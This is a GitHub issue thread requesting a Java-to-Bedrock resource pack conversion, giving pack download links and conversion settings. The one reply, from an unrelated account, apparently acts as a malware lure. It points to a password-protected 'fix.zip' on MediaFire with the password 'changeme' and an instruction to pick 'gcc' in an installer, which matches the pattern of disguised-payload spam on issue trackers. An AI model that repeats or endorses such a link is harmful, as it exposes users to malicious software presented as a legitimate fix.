### ISSUE TITLE
mergeall

### ISSUE THREAD

**Issue by Quoats** [Kas-tle/java2bedrock.sh#33499]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/mcbtdi0le14gpu0i526bo/merged.zip?rlkey=94zfslqnk5mlzzp0928gg6x5g&st=z670b3y3&dl=1

### Bedrock Merge Pack Direct Download URL

https://www.dropbox.com/scl/fi/j3a353ygxap2v4dg4rtkq/dkeinc.zip?rlkey=1qk6kd8v7b6q1kz2e5liwr7zi&st=1fce5pkx&dl=1

### Default Assets Version

None

### Block Material

alpha_test

### Attachable Material

entity_emissive_alpha_one_sided

### Archive Scratch Files

true

### Rename Model Files

true

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
